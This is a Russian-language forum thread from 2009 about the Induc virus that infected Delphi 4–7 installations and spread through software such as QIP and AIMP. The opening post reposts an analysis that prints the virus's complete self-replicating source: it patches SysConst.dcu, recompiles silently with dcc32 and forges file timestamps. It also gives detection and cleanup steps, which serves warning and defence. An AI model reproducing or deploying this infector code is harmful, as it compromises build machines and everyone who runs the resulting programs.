Рейтинг@Mail.ru

Перейти к содержимому


Фотография
- - - - -

Delphi-вирус


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 41

#1 Ссылка на это сообщение Umnik

Umnik
  • МОДЕРАТОР ОЛОЛО
  • avatar
  • Супермодератор
  • PipPipPipPipPipPip
  • 5646 сообщений
997 - Авторитет

Отправлено 14 August 2009 - 07:19 AM

Запускаю с утра Миранду, она обнаруживает обновление плагина vkontakte. В чейнджлоге всего один фикс:
Цитата
Version 0.3.0.5
- новая версия, избавленная от Delphi-вируса (http://gunsmoker.blogspot.com/2009/08/delphi-delphi.html)

Вот копи-паст с указанного адреса:

Delphi-”вирус”: проверьте свою установленную Delphi!
Сегодня обнаружил довольно интересную вредоносную бяку, специфичную именно для Delphi. Это весьма простой, написанный на Delphi, саморазмножающийся код, который иначе как ”вирусом” назвать нельзя. Особенность его в том, что он поражает только установленные Delphi версий 4-7 (включительно), так что любая программа, скомпилированная в ”поражённых” Delphi, будет содержать в себе копию этого вредоносного кода и заражать любые другие найденные Delphi.

Для тех, кто не сильно хочет вникать в детали, вот краткая выдержка (окей, я просто адаптировал объявление с DK, но для надёжности вам лучше бы прочитать пост целиком):

Суть кода в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некторые версии популярного мессенджера QIP и проигрывателя AIMP оказались заражены им (команды разработчиков приносят за это свои извинения).

Пока единственный обнаруженный вредный эффект от вируса - это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x - от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значение ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

Проверьте свои установки Delphi (версий с 4 по 7 включительно) и, если найдёте у себя SysConst.bak, выполните следующие действия:

  1. Удалите SysConst.dcu
  2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске - это убережёт систему от повторного заражения, т.к. вирус не производит заражения, если находит SysConst.bak, считая, что свою работу он уже выполнил.
Не пытайтесь найти вирус в SysConst.pas: его там НЕТ!


Как это началось
Собственно началось всё с обсуждения странной проблемы: Run-time error 3 на, казалось бы, ровном месте. Затем участник с ником Andrey заметил, что проблема как-то связана с QIP 2005 сборки 8094, а именно: изменяется файл SysConst.dcu в папке \Lib установленной Delphi. Несколько человек после этого подтвердили это сообщение, но не стали копать дальше.

Признаться, сперва мне казалось это либо неверными выводами (я работаю в саппорте EurekaLog и тут не счесть случаев, когда человек в чём-то уверен, но на деле всё совсем не так), либо с инфицированными ”настоящими” вирусами сборками с левых сайтов. Хотя изменение именно специфичного для Delphi файла выглядело очень подозрительно. Поэтому когда я приступил к проверке, то для себя я остановился на варианте забытого отладочного кода в QIP или чем-то подобном (я знал, что QIP написан на Delphi).

Однако, установив QIP, скачанный с официального сайта, я убедился в том, что он (сам qip.exe) действительно изменяет файлы SysConst.dcu в папках \Lib установленных Delphi версий 4-7, создавая резервную копию в виде файла SysConst.bak. Я проверял, установив его на WinXP VMWare с установленными Delphi всех версий (кроме 1, разумеется). Подтвердив проблему, я запостил вот эту тему на форуме QIP.

Что это такое
Ну а дальше – надо было просто поглубже копнуть, чтобы посмотреть, что же именно за изменение вносится в SysConst.dcu. В итоге и был обнаружен этот вредоносный код, который выглядит примерно вот так:

Код
uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]',
'=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s);  if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0);  if  h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var  k:HKEY;c:array [1..255] of',
'char;  i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c[i]<>#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var
  i:integer;
begin
  for i:=1 to length(s) do
    if s[i]=#36 then s[i]:=#39;
  result:=s;
end;

procedure re(s,d,e:string);
var
  f1,f2:textfile;
  h:cardinal;
  f:STARTUPINFO;
  p:PROCESS_INFORMATION;
  b:boolean;
  t1,t2,t3:FILETIME;
begin
  h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if h<>DWORD(-1) then
  begin
    CloseHandle(h);
    exit;
  end;
  {'I-}assignfile(f1,s);
  reset(f1);
  if ioresult<>0 then
    exit;
  assignfile(f2,d+'pas');
  rewrite(f2);
  if ioresult<>0 then
  begin
    closefile(f1);
    exit;
  end;

  while not eof(f1) do
  begin
    readln(f1,s);
    writeln(f2,s);
    if pos('implementation',s)<>0 then
      break;
  end;

  for h:= 1 to 1 do
    writeln(f2,sc[h]);
  for h:= 1 to 23 do
    writeln(f2,''''+sc[h],''',');
  writeln(f2,''''+sc[24]+''');');
  for h:= 2 to 24 do
    writeln(f2,x(sc[h]));
  closefile(f1);
  closefile(f2);
  {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
  fillchar(f,sizeof(f),0);
  f.cb := sizeof(f);
  f.dwFlags := STARTF_USESHOWWINDOW;
  f.wShowWindow := SW_HIDE;
  b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
  if b then
    WaitForSingleObject(p.hProcess,INFINITE);
  MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
  DeleteFile(pchar(d+'pas'));
  h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
  if h=DWORD(-1) then
    exit;
  GetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
  h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
  if h=DWORD(-1) then
    exit;
  SetFileTime(h,@t1,@t2,@t3);
  CloseHandle(h);
end;

procedure st;
var  
  k:HKEY;
  c:array [1..255] of char;
  i:cardinal;
  r:string;
  v:char;
begin
  for v:='4' to '7' do
    if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
    begin
      i:=255;
      if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
      begin
        r:='';
        i:=1;
        while c[i]<>#0 do
        begin
          r:=r+c[i];
          inc(i);
        end;
        re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
      end;
    RegCloseKey(k);
  end;
end;

begin
  st;
end.
Весьма несложный код и вы можете разобраться с тем, что он делает, самостоятельно.

Во-первых, он проверяет, не установлена ли на машине Delphi (перебор ключей реестра в procedure st). Если да, то код берёт файл SysConst.pas, дописывает в него себя и компилирует с помощью Delphi-же, помещая новый (уже инфицированный) dcu в папку \Lib (предварительно сделав копию, которая одновременно служит признаком инфицирования), а изменённый pas-файл – удаляет.

Откуда берётся этот самый run-time error 3, который позволил обнаружить этот вредоносный код? Ну, в код закралась ошибочка: если в реестре записан какой-либо неверный путь (например, раньше стояла Delphi 6, а теперь её нет, но ключ остался), то код вылетает вот тут:

Код
  {'I-}assignfile(f1,s);
  reset(f1); // <- возбуждается исключение, если в s записан неверный путь
При вызове reset возбуждается исключение, которое при не инициализированном SysUtils приводит в выбросу ошибки run-time error 3. Интересно, что от этой ситуации должна была защищать директива {$I-} и обработка IOResult, но поскольку автор неудачно выбрал именно символ $ как служебный (в константе sc вместо апострофа), то обратный патч строки превратил {$I-} в {'I-}, что и привело к этой ошибке.

Насколько это серьёзно
Ну, если говорить о популярности этой бяки, то я сделал быстрый QIP-опрос знакомых дельфистов и у примерно 30% из них оказалась эта бяка. Т.е. если учитывать, что не у всех стоят старые Delphi, то среди D7-ков эта штука вполне может быть неплохо распространена.

Если говорить о конкретном вреде, то этот вирус безобиден, т.к. не делает ничего, кроме размножения. От него не было бы вообще никакого отрицательного эффекта, если бы не вышеуказанная ”досадная” ошибка в коде, приводящая к Runtime error 3 на редких машинах.

Собственно пишу я этот пост не потому, что это так уж серьёзно, а, скорее, потому, что это довольно любопытная вещь. Ну и предупредить, конечно: эвон чего бывает. В следующий раз, если вдруг столкнётесь с его братом, будете в курсе.

Кто виноват и что делать
В топике также сообщили о наличии этой же проблемы у некоторых версий популярного проигрывателя AIMP. Ну, быстрый поиск в интернете показал, что подвержены этой пакости оказались не только QIP и AIMP, но и другие программы. Например, вот тут в комментариях сообщается о заражении некоторых плагинов к Miranda. Понятно, что сами программы тут не причём – просто была заражена Delphi, на которых выполнялась сборка дистрибутивов. Увы, антивирусы такие ”высокоуровневые вирусы” не ловят (хорошо бы, кстати, отправить этот код разработчикам какого-нибудь антивируса).

Ну, собственно, что вы можете сделать: если вы используете Delphi 4 – Delphi 7, то проверьте свои Delphi, не инфицированы ли они. Посмотрите в папку \Lib: если там есть файл SysConst.bak, то вы заражены (*).

Что делать, чтобы избавиться от вируса? Удалите файл SysConst.dcu, а затем на его место скопируйте SysConst.bak, т.е.: SysConst.bak –> SysConst.dcu. Помимо избавления от вируса, это также предотвратит повторное заражение. Ну, лучше всего, конечно, взять .dcu файл с дистрибутива - для надёжности (мало ли, вдруг .bak файл тоже оказался изменён).

Если вы не заражены, то вы можете предотвратить заражение в будущем (разумеется, только этим, конкретным вариантом кода), сделав что-либо из следующего (на ваш выбор, можно несколько сразу):

  • Создайте файл SysConst.bak (содержимое не важно) в папках \Lib установленных Delphi. Работоспособность основывается на том факте, что вирус сперва проверяет наличие SysConst.bak. И если он есть – то ничего не делает, считая, что он уже инфицировал эти Delphi.
  • Просто запретить доступ на изменение папки \Lib (ну и \Source до кучи) вообще всем (даже админам). Ну, это не даст вирусу менять файлы, но при этом на Delphi не встанут апдейты, но это вполне действенно. Можно в принципе дать права на запись отдельной учётке и все апдейты запускать из-под неё. Ну или менять права перед установкой апдейтов и возвращать после.
  • Работать в системе ”как полагается”: т.е. не под админом и программы ставить в Program Files. Благодаря этому у обычного пользователя не будет прав на запись в папку, так что ваши файлы останутся в неприкосновенности. А апдейты для Delphi вы всё равно под админом запускать будете. Ну, раньше я уже говорил про Vista-у и пользу UAC в частности. Вот это как раз пример для этого случая.
Замечу, что подобной простой панацеи для уже скомпилированных в заражённой Delphi файлов нет: вам придётся пересобрать их заново. А чтобы определить, какие файлы заражены: запустите поиск по диску всех файлов, содержащих любую "говорящую" подстроку из константы, например: "CreateFile(pchar(d+$bak$),0,0,0,3,0,0)" (без кавычек, разумеется). Также это поможет найти, кто же принёс на вашу машину эту бяку: если вы нашли инфицированный файл, собранный не вами, то это и есть виновник проблем на вашей машине.

Ну, лично мне все эти проблемы по барабану, т.к. я:

  • Работаю в Vista и Delphi стоит в Program Files, что значит, что её файлы защищены ACL списками.
  • Использую D2007 и D2009, а конкретно этот товарищ инфицирует только D4-D7.
  • Не использовал инфицированные варианты QIP и AIMP (ну, тут просто повезло).
Но то, что эти проблемы мне не грозят, не значит, что о них не надо сказать: кто предупреждён, тот вооружён. Удачи smile.gif

Примечания:

(*) Ну, на самом деле, наличие файла SysConst.bak ещё не говорит со 100% точностью о заражении. Вы вполне могли создать этот файл сами или он был создан каким-нибудь вполне легитимным патчем. Чтобы убедиться на 100%, откройте файл SysConst.dcu (dcu, а не bak, т.к. в bak-е лежит девственный оригинал) в блокноте или по F3 в двух-панельном менеджере и поищите строчку ”closefile(f2);” (без кавычек, разумеется). Если нашли – то ваша Delphi точно заражена. Таким же образом можно проверить и собранный exe-файл. Но проверка на SysConst.bak не даёт гарантии от поражения аналогичными вирусами. Конкретно этот экземпляр выдаёт себя наличием файла SysConst.bak. Другие могут не быть столь беспечны, поэтому 100% надёжный способ - сравнить папки \Lib и \Source с дистрибутивными: поставьте куда-нибудь чистую Delphi на чистую машину (лучше всего с read-only сидюка или ISO-образа) и сравните свои папки с чистыми. Только убедитесь, что сервис-паки и апдейты совпадают.

-----------------------------------

Вот еще ссылка на Хабр: http://habrahabr.ru/blogs/virus/66937/
  • 5

#2 Ссылка на это сообщение OlegSych

OlegSych
  • Gold Member
  • avatar
  • Участник
  • PipPipPip
  • 103 сообщений
40 - В теме

Отправлено 14 August 2009 - 09:31 AM

Это пяць! Проникся!
  • 0

#3 Ссылка на это сообщение av killer

av killer
  • Member
  • avatar
  • Участник
  • Pip
  • 31 сообщений
-5 - Нейтрал

Отправлено 14 August 2009 - 09:57 AM

Код отправили к примеру в Авиру? smile.gif
  • 0

#4 Ссылка на это сообщение AlexxSun

AlexxSun
  • V.I.P.
  • avatar
  • Участник
  • PipPipPipPipPip
  • 723 сообщений
150 - Звезда

Отправлено 15 August 2009 - 07:43 PM

Неужели сбылось наконец-то? biggrin.gif

Прямо сегодня после обновления баз на KIS 7.0.1.325 детектируем в QIP версии 8094 Virus.Win32.Induc.a


Жалко, если это сочтут за фолс и уберут детект, было бы хорошим уроком создателям QIPa чтобы впредь не пихали всякую дрянь в свои инсталляторы smile.gif

http://www.virustota...f2cc-1250351440


Похоже, что не фолс, пояснения тут : http://habrahabr.ru/blogs/virus/66937/

http://forum.qip.ru/...ad.php?p=314885
  • 0

#5 Ссылка на это сообщение Yen-Jasker

Yen-Jasker
  • V.I.P.
  • avatar
  • Участник
  • PipPipPipPipPip
  • 549 сообщений
265 - Мудрец

Отправлено 16 August 2009 - 10:17 PM

http://kltest.org.ru...87237e0d#p12745
КИС ругается на квип, находит "индюка", Virus.Win32.Induc.a
Но он ругается и на один из активаторов для Windows 7, с таким же вердиктом. Это странно, может это фолс или "индюк" - туфта?
Аналитики, откуда взялся "индюк"? По-моему нужно проверить семплы зараженных файлов и разобраться что попало в базы.
На viruslist такой зловред не значится.
  • -5

#6 Ссылка на это сообщение Valery Ledovskoy

Valery Ledovskoy
  • Guru
  • avatar
  • Эксперт
  • PipPipPipPipPipPip
  • 3314 сообщений
1082 - Авторитет

Отправлено 16 August 2009 - 10:54 PM

Цитата(Yen-Jasker @ 16.08.2009, 23:17) *
КИС ругается на квип, находит "индюка", Virus.Win32.Induc.a


И что? Отправьте с вердиктом False alarm и ждите ответа.

Цитата(Yen-Jasker @ 16.08.2009, 23:17) *
Но он ругается и на один из активаторов для Windows 7, с таким же вердиктом.


И что, в одном из "активаторов" Windows 7 не может быть вредоноса? Все активаторы поддерживаются MS?

Цитата(Yen-Jasker @ 16.08.2009, 23:17) *
На viruslist такой зловред не значится.


И что? Если вредонос в библиотеке не описан, то это подозрительно? Посчитайте, сколько нужно сейчас техписателей, чтобы описать каждый вредонос.

Да, были люди в наше время,
Не то, что нынешнее племя.
  • 0

#7 Ссылка на это сообщение Yen-Jasker

Yen-Jasker
  • V.I.P.
  • avatar
  • Участник
  • PipPipPipPipPip
  • 549 сообщений
265 - Мудрец

Отправлено 16 August 2009 - 10:59 PM

*
Популярное сообщение!

Цитата(Valery Ledovskoy @ 16.08.2009, 22:54) *
И что? Если вредонос в библиотеке не описан, то это подозрительно? Посчитайте, сколько нужно сейчас техписателей, чтобы описать каждый вредонос.

Когда запись о вредоносе есть, но описания нет - так бывает. А вредонос induc.a вообще не находится по базе viruslist, впервые сталкиваюсь с таким случаем.
Предлагаю обойтись без пространных фраз о нынешнем племени, а разобраться что это за зловред. К сожалению, известны случаи ошибок в антивирусных базах.
  • 10

#8 Ссылка на это сообщение Valery Ledovskoy

Valery Ledovskoy
  • Guru
  • avatar
  • Эксперт
  • PipPipPipPipPipPip
  • 3314 сообщений
1082 - Авторитет

Отправлено 16 August 2009 - 11:07 PM

Цитата(Yen-Jasker @ 16.08.2009, 23:59) *
А вредонос induc.a вообще не находится по базе viruslist, впервые сталкиваюсь с таким случаем.


И чо? О чём это лично вам говорит? Если нет описания, то нет и вредоноса?

Цитата(Yen-Jasker @ 16.08.2009, 23:59) *
К сожалению, известны случаи ошибок в антивирусных базах.


Известны, и немало. Когда Вы сообщили о ложном срабатывании?
Может быть, не знаете, куда писать? Адрес, куда писать, находится в 2 клика. Только мало кто знает, что в теме лучше False Alarm писать wink.gif
Или скажут, что мы уже знаем этого вредоноса, и он будет добавлен в базы при следующем обновлении smile.gif)
Касперский - точно такой же антивирус, как и другие. Точно такие же схемы взаимодействия (надеюсь), что и с другими вирлабами.
  • 0

#9 Ссылка на это сообщение akoK

akoK
  • Gold Member
  • avatar
  • Участник
  • PipPipPip
  • 235 сообщений
75 - Знаток

Отправлено 16 August 2009 - 11:35 PM

Цитата(Valery Ledovskoy @ 16.08.2009, 23:07) *
Известны, и немало. Когда Вы сообщили о ложном срабатывании?

Это не ложное срабатываение. smile.gif

http://habrahabr.ru/blogs/virus/66937/
  • 0

#10 Ссылка на это сообщение Valery Ledovskoy

Valery Ledovskoy
  • Guru
  • avatar
  • Эксперт
  • PipPipPipPipPipPip
  • 3314 сообщений
1082 - Авторитет

Отправлено 17 August 2009 - 12:18 AM

Цитата(akoK @ 17.08.2009, 0:35) *
Это не ложное срабатываение. smile.gif


Значит, всё хорошо. Miranda IM forever. И описания на viruslist ни при чём снова. Можно спать спокойно, чего и всем желаю smile.gif
  • 0

#11 Ссылка на это сообщение Yen-Jasker

Yen-Jasker
  • V.I.P.
  • avatar
  • Участник
  • PipPipPipPipPip
  • 549 сообщений
265 - Мудрец

Отправлено 17 August 2009 - 12:57 AM

Цитата(Valery Ledovskoy @ 16.08.2009, 23:07) *
И чо? О чём это лично вам говорит? Если нет описания, то нет и вредоноса?

Вы опять про описание. Нет даже названия такого вредоноса на вируслисте. Даже для несуществующих вирусов, ошибочно записанных аналитиками в базу, названия на вируслисте были.
Но может это и в самом деле вирус, нужно разбираться.

Но сейчас не нужно злорадствовать по поводу того, что ЛК задетектила QiP Infium как "индюка" за его зловредные функции. Детектируется не сам квип, а вирус, который заразил Дельфи, установленный у разрабов Квипа.
  • 0

#12 Ссылка на это сообщение Umnik

Umnik
  • МОДЕРАТОР ОЛОЛО
  • avatar
  • Супермодератор
  • PipPipPipPipPipPip
  • 5646 сообщений
997 - Авторитет

Отправлено 17 August 2009 - 05:58 AM

http://www.kaspersky...a...amp;x=0&y=0
Главное, он указан здесь.

Yen-Jasker
Надеюсь, "разбирательств" больше не будет
http://www.kaspersky...a...amp;x=0&y=0
http://www.securelis...amp;searchtype=
  • 0

#13 Ссылка на это сообщение Юрий Паршин

Юрий Паршин
  • Platinum Member
  • avatar
  • Участник
  • PipPipPipPip
  • 269 сообщений
330 - Мудрец

Отправлено 17 August 2009 - 06:39 AM

Детект квипа 8094 - не фолса. Он действительно заражен.
  • 0

#14 Ссылка на это сообщение Yen-Jasker

Yen-Jasker
  • V.I.P.
  • avatar
  • Участник
  • PipPipPipPipPip
  • 549 сообщений
265 - Мудрец

Отправлено 17 August 2009 - 10:37 AM

Цитата(Umnik @ 17.08.2009, 5:58) *
http://www.kaspersky...a...amp;x=0&y=0
Главное, он указан здесь.

Yen-Jasker
Надеюсь, "разбирательств" больше не будет
http://www.kaspersky...a...amp;x=0&y=0
http://www.securelis...amp;searchtype=

По первой ссылке указан induc.a, а по третьей какой-то NanoDesu, это один и тот же вирус?

Цитата(Юрий Паршин @ 17.08.2009, 6:39) *
Детект квипа 8094 - не фолса. Он действительно заражен.

Спасибо.

Вот и разобрались, чтобы не путать две разные проблемы.
Цитата(AlexxSun @ 15.08.2009, 19:43) *
Неужели сбылось наконец-то? biggrin.gif

Прямо сегодня после обновления баз на KIS 7.0.1.325 детектируем в QIP версии 8094 Virus.Win32.Induc.a


Жалко, если это сочтут за фолс и уберут детект, было бы хорошим уроком создателям QIPa чтобы впредь не пихали всякую дрянь в свои инсталляторы smile.gif


  • 0

#15 Ссылка на это сообщение Umnik

Umnik
  • МОДЕРАТОР ОЛОЛО
  • avatar
  • Супермодератор
  • PipPipPipPipPipPip
  • 5646 сообщений
997 - Авторитет

Отправлено 17 August 2009 - 10:52 AM

Цитата(Yen-Jasker @ 17.08.2009, 11:37) *
По первой ссылке указан induc.a, а по третьей какой-то NanoDesu, это один и тот же вирус?

Видимо, я слишиком сжато пояснил, практически не пояснил.
Вредонос указан в вирусвоче, этого достаточно. В вируслисте нет очень многих вредоносов, это я показал на примере nanodesu, первое, что вспомнил из непопулярного.
  • 0

#16 Ссылка на это сообщение Dr.Golova

Dr.Golova
  • Platinum Member
  • avatar
  • Участник
  • PipPipPipPip
  • 298 сообщений
55 - Знаток

Отправлено 26 August 2009 - 05:23 AM

Однако... Казалось бы что этот вирус не жилец и чистый концептуал - только дэльфи и только если есть сорцы... Но оказывается, что на этой мертвой платформе не только полно "разработчиков", но они еще и запускают все без разбора на сборочных машинах, и потом выкладывают эти поделки всем желающим. И пипл это хавает! Трижды КУ.
  • 0

#17 Ссылка на это сообщение Umnik

Umnik
  • МОДЕРАТОР ОЛОЛО
  • avatar
  • Супермодератор
  • PipPipPipPipPipPip
  • 5646 сообщений
997 - Авторитет

Отправлено 27 August 2009 - 06:30 AM

Теоритическая выкладка:
1. Появляется подобный зверек для С++/С/С#/не_важно из Студии
2. Заражает С++ в какой-нибудь антивирусной компании
3. Антивирус заражает своих пользователей программистов
Возможно? smile.gif
  • 0

#18 Ссылка на это сообщение Umnik

Umnik
  • МОДЕРАТОР ОЛОЛО
  • avatar
  • Супермодератор
  • PipPipPipPipPipPip
  • 5646 сообщений
997 - Авторитет

Отправлено 27 August 2009 - 06:55 AM

История Индюка от Лаборатории Касперского.
  • 0

#19 Ссылка на это сообщение priv8v

priv8v
  • Guru
  • avatar
  • Участник
  • PipPipPipPipPipPip
  • 1640 сообщений
960 - Авторитет

Отправлено 27 August 2009 - 10:00 AM

Цитата(Umnik @ 27.08.2009, 7:30) *
2. Заражает С++ в какой-нибудь антивирусной компании

Будем надеятся, что в АВ-компаниях на сборочных компах не запускают всякую ересь smile.gif

А может кто-нибудь выложить какой-нибудь hello_world, скомпилированный в делфи, зараженной этим вирусом?..

  • 0

#20 Ссылка на это сообщение Андрей-001

Андрей-001
  • Есть только миг...
  • avatar
  • Участник
  • PipPipPipPipPipPip
  • 3836 сообщений
1098 - Авторитет

Отправлено 27 August 2009 - 11:14 PM

Популярность QIP-семейства и ему подобных в большей степени способствовала распространению "индюка".
Сейчас очень редко не встретишь на ПК пользователей одну их его версий.
Его нет только у тех, у кого пока нет интернет-доступа, равнозначно у них нет и "индючьего" следа.

На днях на ПК клиентов стала проявляться ещё одна хрень, у неё пока нет антивирусного детекта и т.б. названия, но симптомы у всех аналогичны. Главным образом ей подвержены компьютеры "вконтактёров", "одноклассников" и "моймирщиков".
  • 0




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных